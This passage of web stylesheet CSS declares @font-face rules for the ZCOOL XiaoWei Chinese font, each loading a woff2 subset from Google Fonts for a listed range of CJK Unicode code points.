U+8c3f, U+8c47-8c4c, U+8c4e-8c50, U+8c54-8c56, U+8c62, U+8c68, U+8c6c, U+8c73, U+8c78, U+8c7a, U+8c82, U+8c85, U+8c89-8c8a, U+8c8d-8c8e, U+8c90, U+8c93-8c94, U+8c98, U+8c9d-8c9e, U+8ca0-8ca2, U+8ca7-8cac, U+8caf-8cb0, U+8cb3-8cb4, U+8cb6-8cb9, U+8cbb-8cbc;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.36.woff2) format(\'woff2\');unicode-range: U+8a15-8a18, U+8a1a-8a1b, U+8a1d, U+8a1f, U+8a22-8a23, U+8a25, U+8a2b, U+8a2d, U+8a31, U+8a33-8a34, U+8a36-8a38, U+8a3a, U+8a3c, U+8a3e, U+8a40-8a41, U+8a46, U+8a48, U+8a50, U+8a52, U+8a54-8a55, U+8a58, U+8a5b, U+8a5d-8a63, U+8a66, U+8a69-8a6b, U+8a6d-8a6e, U+8a70, U+8a72-8a73, U+8a7a, U+8a85, U+8a87, U+8a8a, U+8a8c-8a8d, U+8a90-8a92, U+8a95, U+8a98, U+8aa0-8aa1, U+8aa3-8aa6, U+8aa8-8aa9, U+8aac-8aae, U+8ab0, U+8ab2, U+8ab8-8ab9, U+8abc, U+8abe-8abf, U+8ac7, U+8acf, U+8ad2, U+8ad6-8ad7, U+8adb-8adc, U+8adf, U+8ae1, U+8ae6-8ae8, U+8aeb, U+8aed-8aee, U+8af1, U+8af3-8af4, U+8af7-8af8, U+8afa, U+8afe, U+8b00-8b02, U+8b07, U+8b0a, U+8b0c, U+8b0e, U+8b10, U+8b17, U+8b19, U+8b1b, U+8b1d, U+8b20-8b21, U+8b26, U+8b28, U+8b2c, U+8b33, U+8b39, U+8b3e-8b3f, U+8b41, U+8b45, U+8b49, U+8b4c, U+8b4f, U+8b57-8b58, U+8b5a, U+8b5c, U+8b5e, U+8b60, U+8b6c, U+8b6f-8b70, U+8b72, U+8b74, U+8b77, U+8b7d;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.37.woff2) format(\'woff2\');unicode-range: U+8882, U+8884-8886, U+8888, U+888f, U+8892-8893, U+889b, U+88a2, U+88a4, U+88a6, U+88a8, U+88aa, U+88ae, U+88b1, U+88b4, U+88b7, U+88bc, U+88c0, U+88c6-88c9, U+88ce-88cf, U+88d1-88d3, U+88d8, U+88db-88dd, U+88df, U+88e1-88e3, U+88e5, U+88e8, U+88ec, U+88f0-88f1, U+88f3-88f4, U+88fc-88fe, U+8900, U+8902, U+8906-8907, U+8909-890c, U+8912-8915, U+8918-891b, U+8921, U+8925, U+892b, U+8930, U+8932, U+8934, U+8936, U+893b, U+893d, U+8941, U+894c, U+8955-8956, U+8959, U+895c, U+895e-8960, U+8966, U+896a, U+896c, U+896f-8970, U+8972, U+897b, U+897e, U+8980, U+8983, U+8985, U+8987-8988, U+898c, U+898f, U+8993, U+8997, U+899a, U+89a1, U+89a7, U+89a9-89aa, U+89b2-89b3, U+89b7, U+89c0, U+89c7, U+89ca-89cc, U+89ce-89d1, U+89d6, U+89da, U+89dc, U+89de, U+89e5, U+89e7, U+89eb, U+89ef, U+89f1, U+89f3-89f4, U+89f8, U+89ff, U+8a01-8a03, U+8a07-8a0a, U+8a0e-8a0f, U+8a13;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.38.woff2) format(\'woff2\');unicode-range: U+86f4, U+86f8-86f9, U+86fb, U+86fe, U+8703, U+8706-870a, U+870d, U+8711-8713, U+871a, U+871e, U+8722-8723, U+8725, U+8729, U+872e, U+8731, U+8734, U+8737, U+873a-873b, U+873e-8740, U+8742, U+8747-8748, U+8753, U+8755, U+8757-8758, U+875d, U+875f, U+8762-8766, U+8768, U+876e, U+8770, U+8772, U+8775, U+8778, U+877b-877e, U+8782, U+8785, U+8788, U+878b, U+8793, U+8797, U+879a, U+879e-87a0, U+87a2-87a3, U+87a8, U+87ab-87ad, U+87af, U+87b3, U+87b5, U+87bd, U+87c0, U+87c4, U+87c6, U+87ca-87cb, U+87d1-87d2, U+87db-87dc, U+87de, U+87e0, U+87e5, U+87ea, U+87ec, U+87ee, U+87f2-87f3, U+87fb, U+87fd-87fe, U+8802-8803, U+8805, U+880a-880b, U+880d, U+8813-8816, U+8819, U+881b, U+881f, U+8821, U+8823, U+8831-8832, U+8835-8836, U+8839, U+883b-883c, U+8844, U+8846, U+884a, U+884e, U+8852-8853, U+8855, U+8859, U+885b, U+885d-885e, U+8862, U+8864, U+8869-886a, U+886e-886f, U+8872, U+8879, U+887d-887f;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.39.woff2) format(\'woff2\');unicode-range: U+8548, U+854e, U+8553, U+8556-8557, U+8559, U+855e, U+8561, U+8564-8565, U+8568-856a, U+856d, U+856f-8570, U+8572, U+8576, U+8579-857b, U+8580, U+8585-8586, U+8588, U+858a, U+858f, U+8591, U+8594, U+8599, U+859c, U+85a2, U+85a4, U+85a6, U+85a8-85a9, U+85ab-85ac, U+85ae, U+85b7-85b9, U+85be, U+85c1, U+85c7, U+85cd, U+85d0, U+85d3, U+85d5, U+85dc-85dd, U+85df-85e0, U+85e5-85e6, U+85e8-85ea, U+85f4, U+85f9, U+85fe-85ff, U+8602, U+8605-8607, U+860a-860b, U+8616, U+8618, U+861a, U+8627, U+8629, U+862d, U+8638, U+863c, U+863f, U+864d, U+864f, U+8652-8655, U+865b-865c, U+865f, U+8662, U+8667, U+866c, U+866e, U+8671, U+8675, U+867a-867c, U+867f, U+868b, U+868d, U+8693, U+869c-869d, U+86a1, U+86a3-86a4, U+86a7-86a9, U+86ac, U+86af-86b1, U+86b4-86b6, U+86ba, U+86c0, U+86c4, U+86c6, U+86c9-86ca, U+86cd-86d1, U+86d4, U+86d8, U+86de-86df, U+86e4, U+86e6, U+86e9, U+86ed, U+86ef-86f3;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.40.woff2) format(\'woff2\');unicode-range: U+83c5, U+83c8-83c9, U+83cb, U+83d1, U+83d3-83d6, U+83d8, U+83db, U+83dd, U+83df, U+83e1, U+83e5, U+83ea-83eb, U+83f0, U+83f4, U+83f8-83f9, U+83fb, U+83fd, U+83ff, U+8401, U+8406, U+840a-840b, U+840f, U+8411, U+8418, U+841c, U+8420, U+8422-8424, U+8426, U+8429, U+842c, U+8438-8439, U+843b-843c, U+843f, U+8446-8447, U+8449, U+844e, U+8451-8452, U+8456, U+8459-845a, U+845c, U+8462, U+8466, U+846d, U+846f-8470, U+8473, U+8476-8478, U+847a, U+847d, U+8484-8485, U+8487, U+8489, U+848c, U+848e, U+8490, U+8493-8494, U+8497, U+849b, U+849e-849f, U+84a1, U+84a5, U+84a8, U+84af, U+84b4, U+84b9-84bf, U+84c1-84c2, U+84c5-84c7, U+84ca-84cb, U+84cd, U+84d0-84d1, U+84d3, U+84d6, U+84df-84e0, U+84e2-84e3, U+84e5-84e7, U+84ee, U+84f3, U+84f6, U+84fa, U+84fc, U+84ff-8500, U+850c, U+8511, U+8514-8515, U+8517-8518, U+851f, U+8523, U+8525-8526, U+8529, U+852b, U+852d, U+8532, U+8534-8535, U+8538-853a, U+853c, U+8543, U+8545;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.41.woff2) format(\'woff2\');unicode-range: U+82bc, U+82be, U+82c0-82c2, U+82c4-82c8, U+82ca-82cc, U+82ce, U+82d0, U+82d2-82d3, U+82d5-82d6, U+82d8-82d9, U+82dc-82de, U+82e0-82e4, U+82e7, U+82e9-82eb, U+82ed-82ee, U+82f3-82f4, U+82f7-82f8, U+82fa-8301, U+8306-8308, U+830c-830d, U+830f, U+8311, U+8313-8315, U+8318, U+831a-831b, U+831d, U+8324, U+8327, U+832a, U+832c-832d, U+832f, U+8331-8334, U+833a-833c, U+8340, U+8343-8345, U+8347-8348, U+834a, U+834c, U+834f, U+8351, U+8356, U+8358-835c, U+835e, U+8360, U+8364-8366, U+8368-836a, U+836c-836e, U+8373, U+8378, U+837b-837d, U+837f-8380, U+8382, U+8388, U+838a-838b, U+8392, U+8394, U+8396, U+8398-8399, U+839b-839c, U+83a0, U+83a2-83a3, U+83a8-83aa, U+83ae-83b0, U+83b3-83b4, U+83b6, U+83b8, U+83ba, U+83bc-83bd, U+83bf-83c0, U+83c2;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.42.woff2) format(\'woff2\');unicode-range: U+8166-8169, U+816b, U+816d, U+8171, U+8173-8174, U+8178, U+817c-817d, U+8182, U+8188, U+8191, U+8198-819b, U+81a0, U+81a3, U+81a5-81a6, U+81a9, U+81b6, U+81ba-81bb, U+81bd, U+81bf, U+81c1, U+81c3, U+81c6, U+81c9-81ca, U+81cc-81cd, U+81d1, U+81d3-81d4, U+81d8, U+81db-81dc, U+81de-81df, U+81e5, U+81e7-81e9, U+81eb-81ec, U+81ee-81ef, U+81f5, U+81f8, U+81fa, U+81fc, U+81fe, U+8200-8202, U+8204, U+8208-820a, U+820e-8210, U+8216-8218, U+821b-821c, U+8221-8224, U+8226-8228, U+822b, U+822d, U+822f, U+8232-8234, U+8237-8238, U+823a-823b, U+823e, U+8244, U+8249, U+824b, U+824f, U+8259-825a, U+825f, U+8266, U+8268, U+826e, U+8271, U+8276-8279, U+827d, U+827f, U+8283-8284, U+8288-828a, U+828d-8291, U+8293-8294, U+8296-8298, U+829f-82a1, U+82a3-82a4, U+82a7-82ab, U+82ae, U+82b0, U+82b2, U+82b4-82b6;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.43.woff2) format(\'woff2\');unicode-range: U+8016, U+8018-8019, U+801c, U+801e, U+8026-802a, U+8031, U+8034-8035, U+8037, U+8043, U+804b, U+804d, U+8052, U+8056, U+8059, U+805e, U+8061, U+8068-8069, U+806e-8074, U+8076-8078, U+807c-8080, U+8082, U+8084-8085, U+8088, U+808f, U+8093, U+809c, U+809f, U+80ab, U+80ad-80ae, U+80b1, U+80b6-80b8, U+80bc-80bd, U+80c2, U+80c4, U+80ca, U+80cd, U+80d1, U+80d4, U+80d7, U+80d9-80db, U+80dd, U+80e0, U+80e4-80e5, U+80e7-80ed, U+80ef-80f1, U+80f3-80f4, U+80fc, U+8101, U+8104-8105, U+8107-8108, U+810c-810e, U+8112-8115, U+8117-8119, U+811b-811f, U+8121-8130, U+8132-8134, U+8137, U+8139, U+813f-8140, U+8142, U+8146, U+8148, U+814d-814e, U+8151, U+8153, U+8158-815a, U+815e, U+8160;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.44.woff2) format(\'woff2\');unicode-range: U+7ef0-7ef2, U+7ef6, U+7efa-7efb, U+7efe, U+7f01-7f04, U+7f08, U+7f0a-7f12, U+7f17, U+7f19, U+7f1b-7f1c, U+7f1f, U+7f21-7f23, U+7f25-7f28, U+7f2a-7f33, U+7f35-7f37, U+7f3d, U+7f42, U+7f44-7f45, U+7f4c-7f4d, U+7f52, U+7f54, U+7f58-7f59, U+7f5d, U+7f5f-7f61, U+7f63, U+7f65, U+7f68, U+7f70-7f71, U+7f73-7f75, U+7f77, U+7f79, U+7f7d-7f7e, U+7f85-7f86, U+7f88-7f89, U+7f8b-7f8c, U+7f90-7f91, U+7f94-7f96, U+7f98-7f9b, U+7f9d, U+7f9f, U+7fa3, U+7fa7-7fa9, U+7fac-7fb2, U+7fb4, U+7fb6, U+7fb8, U+7fbc, U+7fbf-7fc0, U+7fc3, U+7fca, U+7fcc, U+7fce, U+7fd2, U+7fd5, U+7fd9-7fdb, U+7fdf, U+7fe3, U+7fe5-7fe7, U+7fe9, U+7feb-7fec, U+7fee-7fef, U+7ff1, U+7ff3-7ff4, U+7ff9-7ffa, U+7ffe, U+8004, U+8006, U+800b, U+800e, U+8011-8012, U+8014;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.45.woff2) format(\'woff2\');unicode-range: U+7dd2, U+7dd4, U+7dd6-7dd8, U+7dda-7de0, U+7de2-7de6, U+7de8-7ded, U+7def, U+7df1-7df5, U+7df7, U+7df9, U+7dfb-7dfc, U+7dfe-7e02, U+7e04, U+7e08-7e0b, U+7e12, U+7e1b, U+7e1e, U+7e20, U+7e22-7e23, U+7e26, U+7e29, U+7e2b, U+7e2e-7e2f, U+7e31, U+7e37, U+7e39-7e3e, U+7e40, U+7e43-7e44, U+7e46-7e47, U+7e4a-7e4b, U+7e4d-7e4e, U+7e51, U+7e54-7e56, U+7e58-7e5b, U+7e5d-7e5e, U+7e61, U+7e66-7e67, U+7e69-7e6b, U+7e6d, U+7e70, U+7e73, U+7e77, U+7e79, U+7e7b-7e7d, U+7e81-7e82, U+7e8c-7e8d, U+7e8f, U+7e92-7e94, U+7e96, U+7e98, U+7e9a-7e9c, U+7e9e-7e9f, U+7ea1, U+7ea3, U+7ea5, U+7ea8-7ea9, U+7eab, U+7ead-7eae, U+7eb0, U+7ebb, U+7ebe, U+7ec0-7ec2, U+7ec9, U+7ecb-7ecc, U+7ed0, U+7ed4, U+7ed7, U+7edb, U+7ee0-7ee2, U+7ee5-7ee6, U+7ee8, U+7eeb;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.46.woff2) format(\'woff2\');unicode-range: U+7ce8, U+7cec, U+7cf0, U+7cf5-7cf9, U+7cfc, U+7cfe, U+7d00, U+7d04-7d0b, U+7d0d, U+7d10-7d14, U+7d17-7d19, U+7d1b-7d1f, U+7d21, U+7d24-7d26, U+7d28-7d2a, U+7d2c-7d2e, U+7d30-7d31, U+7d33, U+7d35-7d36, U+7d38-7d3a, U+7d40, U+7d42-7d44, U+7d46, U+7d4b-7d4c, U+7d4f, U+7d51, U+7d54-7d56, U+7d58, U+7d5b-7d5c, U+7d5e, U+7d61-7d63, U+7d66, U+7d68, U+7d6a-7d6c, U+7d6f, U+7d71-7d73, U+7d75-7d77, U+7d79-7d7a, U+7d7e, U+7d81, U+7d84-7d8b, U+7d8d, U+7d8f, U+7d91, U+7d94, U+7d96, U+7d98-7d9a, U+7d9c-7da0, U+7da2, U+7da6, U+7daa-7db1, U+7db4-7db8, U+7dba-7dbf, U+7dc1, U+7dc4, U+7dc7-7dc8, U+7dca-7dcd, U+7dcf, U+7dd1;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.47.woff2) format(\'woff2\');unicode-range: U+7bd3-7bd4, U+7bd9-7bda, U+7bdd, U+7be0-7be1, U+7be4-7be6, U+7be9-7bea, U+7bef, U+7bf4, U+7bf6, U+7bfc, U+7bfe, U+7c01, U+7c03, U+7c07-7c08, U+7c0a-7c0d, U+7c0f, U+7c11, U+7c15-7c16, U+7c19, U+7c1e-7c21, U+7c23-7c24, U+7c26, U+7c28-7c33, U+7c35, U+7c37-7c3b, U+7c3d-7c3e, U+7c40-7c41, U+7c43, U+7c47-7c48, U+7c4c, U+7c50, U+7c53-7c54, U+7c59, U+7c5f-7c60, U+7c63-7c65, U+7c6c, U+7c6e, U+7c72, U+7c74, U+7c79-7c7a, U+7c7c, U+7c81-7c82, U+7c84-7c85, U+7c88, U+7c8a-7c91, U+7c93-7c96, U+7c99, U+7c9b-7c9e, U+7ca0-7ca2, U+7ca6-7ca9, U+7cac, U+7caf-7cb3, U+7cb5-7cb7, U+7cba-7cbd, U+7cbf-7cc2, U+7cc5, U+7cc7-7cc9, U+7ccc-7ccd, U+7cd7, U+7cdc, U+7cde, U+7ce0, U+7ce4-7ce5, U+7ce7;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.48.woff2) format(\'woff2\');unicode-range: U+7ae6, U+7af4-7af7, U+7afa-7afb, U+7afd-7b0a, U+7b0c, U+7b0e-7b0f, U+7b13, U+7b15-7b16, U+7b18-7b19, U+7b1e-7b20, U+7b22-7b25, U+7b29-7b2b, U+7b2d-7b2e, U+7b30-7b3b, U+7b3e-7b3f, U+7b41-7b42, U+7b44-7b47, U+7b4a, U+7b4c-7b50, U+7b58, U+7b5a, U+7b5c, U+7b60, U+7b66-7b67, U+7b69, U+7b6c-7b6f, U+7b72-7b76, U+7b7b-7b7d, U+7b7f, U+7b82, U+7b85, U+7b87, U+7b8b-7b96, U+7b98-7b99, U+7b9b-7b9f, U+7ba2-7ba4, U+7ba6-7bac, U+7bae-7bb0, U+7bb4, U+7bb7-7bb9, U+7bbb, U+7bc0-7bc1, U+7bc3-7bc4, U+7bc6, U+7bc8-7bcc, U+7bd1;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.49.woff2) format(\'woff2\');unicode-range: U+798b-798e, U+7992, U+7994-7995, U+7997-7998, U+799a-799c, U+799f, U+79a3-79a6, U+79a8-79ac, U+79ae-79b1, U+79b3-79b5, U+79b8, U+79ba, U+79bf, U+79c2, U+79c6, U+79c8, U+79cf, U+79d5-79d6, U+79dd-79de, U+79e3, U+79e7-79e8, U+79eb, U+79ed, U+79f4, U+79f7-79f8, U+79fa, U+79fe, U+7a02-7a03, U+7a05, U+7a0a, U+7a14, U+7a17, U+7a19, U+7a1c, U+7a1e-7a1f, U+7a23, U+7a25-7a26, U+7a2c, U+7a2e, U+7a30-7a32, U+7a36-7a37, U+7a39, U+7a3c, U+7a40, U+7a42, U+7a47, U+7a49, U+7a4c-7a4f, U+7a51, U+7a55, U+7a5b, U+7a5d-7a5e, U+7a62-7a63, U+7a66, U+7a68-7a69, U+7a6b, U+7a70, U+7a78, U+7a80, U+7a85-7a88, U+7a8a, U+7a90, U+7a93-7a96, U+7a98, U+7a9b-7a9c, U+7a9e, U+7aa0-7aa1, U+7aa3, U+7aa8-7aaa, U+7aac-7ab0, U+7ab3, U+7ab8, U+7aba, U+7abd-7abf, U+7ac4-7ac5, U+7ac7-7ac8, U+7aca, U+7ad1-7ad2, U+7ada-7add, U+7ae1, U+7ae4;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.50.woff2) format(\'woff2\');unicode-range: U+784c, U+784e-7854, U+7856-7857, U+7859-785a, U+7865, U+7869-786a, U+786d, U+786f, U+7876-7877, U+787c, U+787e-787f, U+7881, U+7887-7889, U+7893-7894, U+7898-789e, U+78a1, U+78a3, U+78a5, U+78a9, U+78ad, U+78b2, U+78b4, U+78b6, U+78b9-78ba, U+78bc, U+78bf, U+78c3, U+78c9, U+78cb, U+78d0-78d2, U+78d4, U+78d9-78da, U+78dc, U+78de, U+78e1, U+78e5-78e6, U+78ea, U+78ec, U+78ef, U+78f1-78f2, U+78f4, U+78fa-78fb, U+78fe, U+7901-7902, U+7905, U+7907, U+7909, U+790b-790c, U+790e, U+7910, U+7913, U+7919-791b, U+791e-791f, U+7921, U+7924, U+7926, U+792a-792b, U+7934, U+7936, U+7939, U+793b, U+793d, U+7940, U+7942-7943, U+7945-7947, U+7949-794a, U+794c, U+794e-7951, U+7953-7955, U+7957-795a, U+795c, U+795f-7960, U+7962, U+7964, U+7966-7967, U+7969, U+796b, U+796f, U+7972, U+7974, U+7979, U+797b-797c, U+797e-7980, U+7982, U+7986-7987, U+7989-798a;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.51.woff2) format(\'woff2\');unicode-range: U+7722, U+7726, U+7728, U+772b-7730, U+7732-7736, U+7739-773a, U+773d-773f, U+7743, U+7746-7747, U+774c-774f, U+7751-7752, U+7758-775a, U+775c-775e, U+7762, U+7765-7766, U+7768-776a, U+776c-776d, U+7771-7772, U+777a, U+777c-777e, U+7780, U+7785, U+7787, U+778b-778d, U+778f-7791, U+7793, U+779e-77a0, U+77a2, U+77a5, U+77ad, U+77af, U+77b4-77b7, U+77bd-77c0, U+77c2, U+77c5, U+77c7, U+77cd, U+77d6-77d7, U+77d9-77da, U+77dd-77de, U+77e7, U+77ea, U+77ec, U+77ef, U+77f8, U+77fb, U+77fd-77fe, U+7800, U+7803, U+7806, U+7809, U+780f-7812, U+7815, U+7817-7818, U+781a-781f, U+7821-7823, U+7825-7827, U+7829, U+782b-7830, U+7832-7833, U+7835, U+7837, U+7839-783c, U+783e, U+7841-7844, U+7847-7849, U+784b;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.52.woff2) format(\'woff2\');unicode-range: U+7613-7619, U+761b-761d, U+761f-7622, U+7625, U+7627-762a, U+762e-7630, U+7632-7635, U+7638-763a, U+763c-763d, U+763f-7640, U+7642-7643, U+7647-7648, U+764d-764e, U+7652, U+7654, U+7658, U+765a, U+765c, U+765e-765f, U+7661-7663, U+7665, U+7669, U+766c, U+766e-766f, U+7671-7673, U+7675-7676, U+7678-767a, U+767f, U+7681, U+7683, U+7688, U+768a-768c, U+768e, U+7690-7692, U+7695, U+7698, U+769a-769b, U+769d-76a0, U+76a2, U+76a4-76a7, U+76ab-76ac, U+76af-76b0, U+76b2, U+76b4-76b5, U+76ba-76bb, U+76bf, U+76c2-76c3, U+76c5, U+76c9, U+76cc-76ce, U+76dc-76de, U+76e1-76ea, U+76f1, U+76f9-76fb, U+76fd, U+76ff-7700, U+7703-7704, U+7707-7708, U+770c-770f, U+7712, U+7714, U+7716, U+7719-771b, U+771e, U+7721;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.53.woff2) format(\'woff2\');unicode-range: U+750d, U+750f, U+7511, U+7513, U+7515, U+7517, U+7519, U+7521-7527, U+752a, U+752c-752d, U+752f, U+7534, U+7536, U+753a, U+753e, U+7540, U+7544, U+7547-754b, U+754d-754e, U+7550-7553, U+7556-7557, U+755a-755b, U+755d-755e, U+7560, U+7562, U+7564, U+7566-7568, U+756b-756c, U+756f-7573, U+7575, U+7579-757c, U+757e-757f, U+7581-7584, U+7587, U+7589-758e, U+7590, U+7592, U+7594, U+7596, U+7599-759a, U+759d, U+759f-75a0, U+75a3, U+75a5, U+75a8, U+75ac-75ad, U+75b0-75b1, U+75b3-75b5, U+75b8, U+75bd, U+75c1-75c4, U+75c8-75ca, U+75cc-75cd, U+75d4, U+75d6, U+75d9, U+75de, U+75e0, U+75e2-75e4, U+75e6-75ea, U+75f1-75f3, U+75f7, U+75f9-75fa, U+75fc, U+75fe-7601, U+7603, U+7605-7606, U+7608-760e, U+7610-7612;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.54.woff2) format(\'woff2\');unicode-range: U+73f0, U+73f2, U+73f4-73f5, U+73f7, U+73f9-73fa, U+73fc-73fd, U+73ff-7402, U+7404, U+7407-7408, U+740a-740f, U+7418, U+741a-741c, U+741e, U+7424-7425, U+7428-7429, U+742c-7430, U+7432, U+7435-7436, U+7438-743b, U+743e-7441, U+7443-7446, U+7448, U+744a-744b, U+7452, U+7457, U+745b, U+745d, U+7460, U+7462-7465, U+7467-746a, U+746d, U+746f, U+7471, U+7473-7474, U+7477, U+747a, U+747e, U+7481-7482, U+7484, U+7486, U+7488-748b, U+748e-748f, U+7493, U+7498, U+749a, U+749c-74a0, U+74a3, U+74a6, U+74a9-74aa, U+74ae, U+74b0-74b2, U+74b6, U+74b8-74ba, U+74bd, U+74bf, U+74c1, U+74c3, U+74c5, U+74c8, U+74ca, U+74cc, U+74cf, U+74d1-74d2, U+74d4-74d5, U+74d8-74db, U+74de-74e0, U+74e2, U+74e4-74e5, U+74e7-74e9, U+74ee-74ef, U+74f4, U+74ff, U+7501, U+7503, U+7505, U+7508;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.55.woff2) format(\'woff2\');unicode-range: U+72e6, U+72e8, U+72ef-72f0, U+72f2-72f4, U+72f6-72f7, U+72f9-72fb, U+72fd, U+7300-7304, U+7307, U+730a-730c, U+7313-7317, U+731d-7322, U+7327, U+7329, U+732c-732d, U+7330-7331, U+7333, U+7335-7337, U+7339, U+733d-733e, U+7340, U+7342, U+7344-7345, U+734a, U+734d-7350, U+7352, U+7355, U+7357, U+7359, U+735f-7360, U+7362-7363, U+7365, U+7368, U+736c-736d, U+736f-7370, U+7372, U+7374-7376, U+7378, U+737a-737b, U+737d-737e, U+7382-7383, U+7386, U+7388, U+738a, U+738c-7393, U+7395, U+7397-739a, U+739c, U+739e, U+73a0-73a3, U+73a5-73a8, U+73aa, U+73ad, U+73b1, U+73b3, U+73b6-73b7, U+73b9, U+73c2, U+73c5-73c9, U+73cc, U+73ce-73d0, U+73d2, U+73d6, U+73d9, U+73db-73de, U+73e3, U+73e5-73ea, U+73ee-73ef;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.56.woff2) format(\'woff2\');unicode-range: U+71a8, U+71af, U+71b1-71bc, U+71be, U+71c1-71c2, U+71c4, U+71c8-71cb, U+71ce-71d0, U+71d2, U+71d4, U+71d9-71da, U+71dc, U+71df-71e0, U+71e6-71e8, U+71ea, U+71ed-71ee, U+71f4, U+71f6, U+71f9, U+71fb-71fc, U+71ff-7200, U+7207, U+720c-720d, U+7210, U+7216, U+721a-721e, U+7223, U+7228, U+722b, U+722d-722e, U+7230, U+7232, U+723a-723c, U+723e-7242, U+7246, U+724b, U+724d-724e, U+7252, U+7256, U+7258, U+725a, U+725c-725d, U+7260, 